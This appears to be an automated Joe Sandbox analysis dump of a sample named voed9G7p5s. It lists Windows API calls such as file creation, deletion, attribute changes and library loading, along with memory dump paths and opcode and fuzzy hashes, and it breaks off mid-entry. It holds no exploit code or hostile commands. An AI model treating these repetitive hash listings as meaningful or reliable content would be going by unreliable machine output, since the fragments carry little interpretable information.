                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E2BA44,?), ref: 00E2B7E6
                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E2BA89,?,00000000), ref: 00E2BC64
                                                                                                    • GetCPInfo.KERNEL32(00000000,00E2BA89,?,?,?,00E2BA89,?,00000000), ref: 00E2BC77
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CodeInfoPageValid
                                                                                                    • String ID:
                                                                                                    • API String ID: 546120528-0
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00E09A50,?,?,00000000,?,?,00E08CBC,?), ref: 00E09BAB
                                                                                                    • GetLastError.KERNEL32(?,00000000,00E08411,-00009570,00000000,000007F3), ref: 00E09BB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 76a99e9de7d24b64af308780e96def8f6882054d85cff11832217ada2e5b95a0
                                                                                                    • Instruction ID: 4a23b0669135f3d1a8eeb577f1899a602d399923073a5b8c7cb335e9fc808d63
                                                                                                    • Opcode Fuzzy Hash: 76a99e9de7d24b64af308780e96def8f6882054d85cff11832217ada2e5b95a0
                                                                                                    • Instruction Fuzzy Hash: 4541DE306043018FDB24DF25E58496AB7E5FBD4324F149A2DE891A32E3D770AC848E59
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E01E55
                                                                                                      • Part of subcall function 00E03BBA: __EH_prolog.LIBCMT ref: 00E03BBF
                                                                                                    • _wcslen.LIBCMT ref: 00E01EFD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2838827086-0
                                                                                                    • Opcode ID: d4a907c3896ddc289b39cc5d5c3a0023eee13209a195027fa1b6fe4abb509d89
                                                                                                    • Instruction ID: f224e7db64ca74f9293ab96cdaea24ea3a98261b3c097611a1e29bb7d785f9bb
                                                                                                    • Opcode Fuzzy Hash: d4a907c3896ddc289b39cc5d5c3a0023eee13209a195027fa1b6fe4abb509d89
                                                                                                    • Instruction Fuzzy Hash: F2314A71904209AFCF15DFA8C945AEEBBF6AF48304F1010ADE845B7291C7365E91CB60
                                                                                                    APIs
                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E073BC,?,?,?,00000000), ref: 00E09DBC
                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E09E70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1392018926-0
                                                                                                    • Opcode ID: ebef00d2a5f1ece77efa6831570799bc51dc005f33a70699aa92aeb251d3ea25
                                                                                                    • Instruction ID: 1d09516cec843a621ebaab2b56dfbffea0302eb166e0b30f6dad0b73ebed61e4
                                                                                                    • Opcode Fuzzy Hash: ebef00d2a5f1ece77efa6831570799bc51dc005f33a70699aa92aeb251d3ea25
                                                                                                    • Instruction Fuzzy Hash: 892104312882469FC714CF74C891AABBBE4AF91308F08591CF4D593183D328DD8DCB61
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00E09F27,?,?,00E0771A), ref: 00E096E6
                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00E09F27,?,?,00E0771A), ref: 00E09716
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 44f7fa20b0960b401d57de28f412d1527d3442dd7b9d876124b0b3219559e945
                                                                                                    • Instruction ID: 48d7580cd2653e6ef2bfaaecacee2642d1c15fb0cd5d87b73335126b7eeac581
                                                                                                    • Opcode Fuzzy Hash: 44f7fa20b0960b401d57de28f412d1527d3442dd7b9d876124b0b3219559e945
                                                                                                    • Instruction Fuzzy Hash: 0C21ACB1500344AEE2308E659C89BE7B7DCEB49324F101A19FAD6E25D3C7A5A8C48A71
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00E09EC7
                                                                                                    • GetLastError.KERNEL32 ref: 00E09ED4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 5413912ca5a987cf3e9be99f6fe529819294dbfe767fb9cb06f4cca06e807dc5
                                                                                                    • Instruction ID: d6336fa2687594f3bb9c0892736a4938c563d465747a145458513463bb02de20
                                                                                                    • Opcode Fuzzy Hash: 5413912ca5a987cf3e9be99f6fe529819294dbfe767fb9cb06f4cca06e807dc5
                                                                                                    • Instruction Fuzzy Hash: DA11E530600704ABD734DA39CC45BA6B7E9AB44364F505A6AE162F26D2D770EDCACB60
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00E28E75
                                                                                                      • Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00E41098,00E017CE,?,?,00000007,?,?,?,00E013D6,?,00000000), ref: 00E28EB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1482568997-0
                                                                                                    • Opcode ID: 5dd59248cc81be74c4a55ca44d66e4df6f3209084a74e98c20adcff2b197dc3a
                                                                                                    • Instruction ID: 7d19c49885f4e4d7b03f25dc191bf4a1a6c60ba54030144a3365a622094d4e0b
                                                                                                    • Opcode Fuzzy Hash: 5dd59248cc81be74c4a55ca44d66e4df6f3209084a74e98c20adcff2b197dc3a
                                                                                                    • Instruction Fuzzy Hash: 4EF0F6326031396ADB212B26BE05FAF37989F81B70F277125F814BA1A1DF70DD0081A1
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00E110AB
                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00E110B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                    • String ID:
                                                                                                    • API String ID: 1231390398-0
                                                                                                    • Opcode ID: 21c2e8818e611511c76d90997c27c875d846a7db6a63ddb2cecc3079c048f7e2
                                                                                                    • Instruction ID: 676e5058b6fa73cb9fddeebd049ff59b7ac67a5daff0af5e0775ef04e2270afb
                                                                                                    • Opcode Fuzzy Hash: 21c2e8818e611511c76d90997c27c875d846a7db6a63ddb2cecc3079c048f7e2
                                                                                                    • Instruction Fuzzy Hash: C6E09232F00149AB8F0D87B59C099EB76DDEA4820831051F9E603F7101F934DEC54A60
                                                                                                    APIs
                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A501
                                                                                                      • Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A532
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: 8be4d6f59674d144d572797123b88343de1a8dacbd73ef1f6cde055f97895071
                                                                                                    • Instruction ID: 0686bb6b5da50affa385db07ac19522cbbcba06fd7df4131c329976d0b16fdb2
                                                                                                    • Opcode Fuzzy Hash: 8be4d6f59674d144d572797123b88343de1a8dacbd73ef1f6cde055f97895071
                                                                                                    • Instruction Fuzzy Hash: 76F0153224024DABEB015F61DC45FDA3BBCBB0438AF488061B949E61A0DB71DAD8AA50
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641,000000FF), ref: 00E0A1F1
                                                                                                      • Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641), ref: 00E0A21F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2643169976-0
                                                                                                    • Opcode ID: 2709cf1331fa934cd3962604e534564f5921acfc52d1cdbdadc759ac776f32d6
                                                                                                    • Instruction ID: 276ca05c81328b0d8fa98369a628458d2f0afdfaf2f3664941241155155ded69
                                                                                                    • Opcode Fuzzy Hash: 2709cf1331fa934cd3962604e534564f5921acfc52d1cdbdadc759ac776f32d6
                                                                                                    • Instruction Fuzzy Hash: 21E06D316402096BDB115B61EC45FD9379CAB183C6F484031B944E20A0EB61DAC89A50
                                                                                                    APIs
                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00E32641,000000FF), ref: 00E1ACB0
                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00E32641,000000FF), ref: 00E1ACB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3856339756-0
                                                                                                    • Opcode ID: 32d70ae944bb0f0c1685f842516ae7c76fd74a174c3c7c3c0c9e211ee48b895a
                                                                                                    • Instruction ID: 3982b89dc56c314098a19bd4f49bd96cc01d836f36ae932f396b9d3b11ae4455
                                                                                                    • Opcode Fuzzy Hash: 32d70ae944bb0f0c1685f842516ae7c76fd74a174c3c7c3c0c9e211ee48b895a
                                                                                                    • Instruction Fuzzy Hash: 4EE06572604650EFC7109B59DC06F4AFBA8FB49F20F004269F416E3760CB746841CA90
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00E0A23A,?,00E0755C,?,?,?,?), ref: 00E0A254
                                                                                                      • Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00E0A23A,?,00E0755C,?,?,?,?), ref: 00E0A280
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: 34ca2239e02e5f03bd324222d32fe169c1ad95cfb879713779ad0a442c5d0e24
                                                                                                    • Instruction ID: 1b2e8de6a5cbd1779acc5b71dd10ff06ff1078132d3257c953c47facab3241c0
                                                                                                    • Opcode Fuzzy Hash: 34ca2239e02e5f03bd324222d32fe169c1ad95cfb879713779ad0a442c5d0e24
                                                                                                    • Instruction Fuzzy Hash: BFE092315001285BDB20ABA4CC09BD9BBA8AB083E5F044271FD44F32E0D770DE88CAE0
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00E1DEEC
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00E1DF03
                                                                                                      • Part of subcall function 00E1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
                                                                                                      • Part of subcall function 00E1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
                                                                                                      • Part of subcall function 00E1B568: IsDialogMessageW.USER32(00010420,?), ref: 00E1B59E
                                                                                                      • Part of subcall function 00E1B568: TranslateMessage.USER32(?), ref: 00E1B5AC
                                                                                                      • Part of subcall function 00E1B568: DispatchMessageW.USER32(?), ref: 00E1B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2718869927-0
                                                                                                    • Opcode ID: a4f4c531790f4e38d65f1506b477c86e44add7ee209a18999cf135075de0e5cc
                                                                                                    • Instruction ID: 9d0984247ecfdf410c6cb007e06baf1952a621bb7d723cea4a5ee78d1d329eb4
                                                                                                    • Opcode Fuzzy Hash: a4f4c531790f4e38d65f1506b477c86e44add7ee209a18999cf135075de0e5cc
                                                                                                    • Instruction Fuzzy Hash: 89E09BF55002482ADF01A761DD06FDE37AC5B05785F040852B710F61E3D975DA558661
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1175261203-0
                                                                                                    • Opcode ID: 96f017f2be42cec3bb83757e9342fc42ebeceaa2bf23a240366615b3bc95aae5
                                                                                                    • Instruction ID: eed4b9b6b8607a52e159622738f72eb3351a699daaa3c8eac9f152f31c2c4297
                                                                                                    • Opcode Fuzzy Hash: 96f017f2be42cec3bb83757e9342fc42ebeceaa2bf23a240366615b3bc95aae5
                                                                                                    • Instruction Fuzzy Hash: D8E012B65001586ADB11A7A59C49FDA7BACAF09391F0400657645F2144D674DAC48AA0
                                                                                                    APIs
                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E1A3DA
                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E1A3E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1918208029-0
                                                                                                    • Opcode ID: e2f68d38fbedc12acff74430c779c6b6d32d882a8a1f929cfd43a39c5ffcd55e
                                                                                                    • Instruction ID: 42c87e4a12630839bcee528b4fe03e1f8c3ef38adf308538d2c11def68ef4fab
                                                                                                    • Opcode Fuzzy Hash: e2f68d38fbedc12acff74430c779c6b6d32d882a8a1f929cfd43a39c5ffcd55e
                                                                                                    • Instruction Fuzzy Hash: 3CE0ED71505218EBCB20DF55C545BEDBBE8EB14364F10906AA856A3341E374AE44DB91
                                                                                                    APIs
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E22BAA
                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E22BB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                    • String ID:
                                                                                                    • API String ID: 1660781231-0
                                                                                                    • Opcode ID: 8c17c33b430ad4e7a960384e0793186e9cc957034637b2e87ffcfa88475d5647
                                                                                                    • Instruction ID: 11f473217b058279d18cc85b84124e02758a4103096604633f36aa65519d3914
                                                                                                    • Opcode Fuzzy Hash: 8c17c33b430ad4e7a960384e0793186e9cc957034637b2e87ffcfa88475d5647
                                                                                                    • Instruction Fuzzy Hash: 45D0223419833038CC242F703C0F58933C5AE41BB97A0379EFB21B58C1EE168040A421
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3351165006-0
                                                                                                    • Opcode ID: 217cc3ffe5bf687937fa1a3c8f0857b0a4666e15b9f7fe497009440a79314460
                                                                                                    • Instruction ID: abe53324f0b02391198250500d67c02fabc22b9d9d170fe18cef90598e297499
                                                                                                    • Opcode Fuzzy Hash: 217cc3ffe5bf687937fa1a3c8f0857b0a4666e15b9f7fe497009440a79314460
                                                                                                    • Instruction Fuzzy Hash: 4CC0123245C200BECB010BB5EC09C2BBBA8ABA7312F24C908F0A5D0061C238C114DB11
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 6be482de4db259b8967c8f2a13eafaa883752d9aa37ffd2e7827e133599cc623
                                                                                                    • Instruction ID: a298e65dc0a4a1ad2bf27b519aacd5bfb5cb933c68e914470a5e93b19329979e
                                                                                                    • Opcode Fuzzy Hash: 6be482de4db259b8967c8f2a13eafaa883752d9aa37ffd2e7827e133599cc623
                                                                                                    • Instruction Fuzzy Hash: 56C19F30A002549FEF19DF68C898BA97BA5AF15314F0821F9EC45BF2D6DB3199C4CB61
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: d7258fd1f93963dc42caa401835fe8f5f51d780493038be1e8af67e563ae0f53
                                                                                                    • Instruction ID: 0909dca6f904033d64e2ea29b252dce926b50c5310779512a8eba1844fdcf350
                                                                                                    • Opcode Fuzzy Hash: d7258fd1f93963dc42caa401835fe8f5f51d780493038be1e8af67e563ae0f53
                                                                                                    • Instruction Fuzzy Hash: E871D271500B849EDB35DB70CC95AE7F7E9AF14301F40192EE2ABA7281DA326AC4CF11
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E08289
                                                                                                      • Part of subcall function 00E013DC: __EH_prolog.LIBCMT ref: 00E013E1
                                                                                                      • Part of subcall function 00E0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E0A598
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506663941-0
                                                                                                    • Opcode ID: 04053666bd578900454908af92eba5d09e7eef8d990be56106658cbc634a80b2
                                                                                                    • Instruction ID: 0f7f149fe8b37018ea4d1d3660424ffc95a24375791595d67ddbe4c16f9d3555
                                                                                                    • Opcode Fuzzy Hash: 04053666bd578900454908af92eba5d09e7eef8d990be56106658cbc634a80b2
                                                                                                    • Instruction Fuzzy Hash: EC41B5719446589ADB20EBA0CD55AEAB3B8AF40304F0424EAE1DAB70D3EB755FC4CF10
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E013E1
                                                                                                      • Part of subcall function 00E05E37: __EH_prolog.LIBCMT ref: 00E05E3C
                                                                                                      • Part of subcall function 00E0CE40: __EH_prolog.LIBCMT ref: 00E0CE45
                                                                                                      • Part of subcall function 00E0B505: __EH_prolog.LIBCMT ref: 00E0B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 3beecffe41e1592f88d90101d797bf4f4e5a69357da94ba08beb5e4644d75b3f
                                                                                                    • Instruction ID: 8be30ff35cae28cfc634633eaa2f93b2ad0300d6559acd51498ab987b042c670
                                                                                                    • Opcode Fuzzy Hash: 3beecffe41e1592f88d90101d797bf4f4e5a69357da94ba08beb5e4644d75b3f
                                                                                                    • Instruction Fuzzy Hash: 8F4158B0905B409EE724CF798885AE7FBE5BF18300F50596EE5FE97282CB716694CB10
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E013E1
                                                                                                      • Part of subcall function 00E05E37: __EH_prolog.LIBCMT ref: 00E05E3C
                                                                                                      • Part of subcall function 00E0CE40: __EH_prolog.LIBCMT ref: 00E0CE45
                                                                                                      • Part of subcall function 00E0B505: __EH_prolog.LIBCMT ref: 00E0B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
